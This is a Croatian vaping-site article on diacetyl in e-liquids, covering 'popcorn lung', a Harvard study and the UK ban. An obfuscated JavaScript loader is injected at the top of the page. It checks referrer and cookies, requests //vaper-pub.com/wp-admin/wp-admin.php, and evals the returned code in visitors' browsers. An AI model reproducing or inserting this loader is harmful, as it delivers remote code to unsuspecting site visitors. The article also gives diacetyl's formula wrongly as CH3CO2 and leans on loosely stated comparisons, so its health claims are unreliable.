;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Što je dijacetil i trebamo li biti zabrinuti?

Puno se pričalo o dijacetilu u vape tekućinama i dok ga jedni predstavljaju kao ogromnu opasnost, drugi tvrde da je ovaj spoj nešto o čemu uopće ne trebamo razmišljati. Pa što se ovdje zapravo događa i trebamo li biti zabrinuti?

Što je dijacetil?

Dijacetil je organski spoj koji je žućkasta tekućina s kemijskom formulom CH3CO2. Ima okus po maslacu. Uz acetoin, dijacetil je kemikalija koja maslacu daje aromu. Zapravo, to je nusprodukt procesa fermentacije koji se koristi za proizvodnju mliječnih i drugih proizvoda. Na primjer, dijacetil ćete pronaći u alkoholnim pićima.

Dijacetil se smatra sigurnim za ljudsku prehranu. Osim što se nalazi u mliječnim i alkoholnim pićima, koristi se kao aroma maslaca u drugim prehrambenim proizvodima. To je ono zbog čega margarin ima okus poput maslaca i zbog čega kokice iz mikrovalne imaju onu bogatu aromu koju svi volimo.

Ipak, dok možete jesti hranu koja sadrži dijacetil do mile volje, udisanje ove supstance može biti problematično.

Medijska ludnica oko dijacetila u e-tekućinama započela je studijom Sveučilišta Harvard koja ga je pronašla u 75% marki e-tekućina koje su testirali. U nastavku teksta pojasnit ćemo što ovo zapravo znači za nas kao potrošače.

Je li dijacetil opasan?

Kaže se da udisanje dijacetila uzrokuje bolest “pluća kokice”, također poznatu kao obliterans bronhiolitisa, bolest koja oštećuje male dišne ​​putove u plućima. Simptomi uključuju kašalj, poteškoće s disanjem i umor. Bolest se naziva “pluća kokica” jer je zaposlenicima u tvornicama kokica koje su koristile dijacetil dijagnosticirana ova bolest.

Analiza je pokazala da su radnici tvornice kokica cijelu smjenu provodili na području gdje je dijacetil u zraku izmjeren na 18 dijelova na milijun. Smatralo se da je stalna, dugotrajna izloženost na toj razini opasna po zdravlje.

Kao rezultat CDC analize dijacetila, OSHA je uvela odredbe za radnike tvornice kokica da nose zaštitnu opremu kako bi izbjegli udisanje dijacetila. Postojao je i slučaj da je muškarac iz Colorada obolio od respiratorne bolesti nakon što je svaki dan deset godina jeo kokice iz mikrovalne pećnice.

Veza između udisanja dijacetila i bronhiolitisa obliteransa je razlog zašto je Harvardska studija podigla uzbunu o potencijalnom problemu u e-tekućinama.

Dijacetil u e-tekućinama

Harvardska studija koja je pronašla dijacetil u e-tekućini izazvala je medijsku ludnicu. Istraživači sa Sveučilišta Harvard pronašli su dijacetil u 75% e-tekućina koje su testirali. Testirali su nekoliko okusa svakog od osam različitih brendova. Postoje marke e-tekućina koje su u to vrijeme koristile dijacetil. Kad bi testirali marku koja ga je koristila, tada bi svaki okus bio pozitivan, iskrivljujući brojke prema gore. Kad kažu, pronašli su diacetil u 39 od 51 uzorka, imajte na umu da je tih 51 uzorak bio samo od osam različitih marki.

Istraživači nisu zaključili da će dijacetil uzrokovati respiratorne bolesti. Međutim, sugerirali su da njihovo otkriće ukazuje na potrebu za daljnjim proučavanjem. To je razumna pozicija koja ima smisla. Trebamo više studija o ovom pitanju.

Da bi se ovdje dodala neka perspektiva, studije su pokazale da kada je dijacetil otkriven u pari, izmjeren je na 9,0 mikrograma. Razina diacetila u duhanskom dimu izmjerena je na 335,9 mikrograma. Dim cigarete izlaže korisnike duhana eksponencijalno višim razinama ove supstance nego para iz e-cigareta.

E-tekućine bez dijacetila

Iako ne postoji poznata veza između dijacetila i stanja pluća, ako ste zabrinuti, dobra vijest je e-tekućine koje sadrže ovu supstancu lako izbjeći Mnoge od najboljih tvrtki za e-tekućine ne koriste dijacetil ni u jednom od svojih proizvoda.

  • Potražite proizvođače koje koriste profesionalne laboratorije
  • Potražite izvješća neovisnih laboratorija koja potvrđuju sastojke e-tekućina

U Ujedinjenom Kraljevstvu, dijacetil je već zabranjen u e-tekućinama, a ovaj bi zakon uskoro bi mogao biti praćen i u drugim zemljama. Dakle, parenjebez dijacetila nije problem jer nije bitan sastojak e-tekućine i vrlo se lako izbaciti iz upotrebe.

Choose your Reaction!
Leave a Comment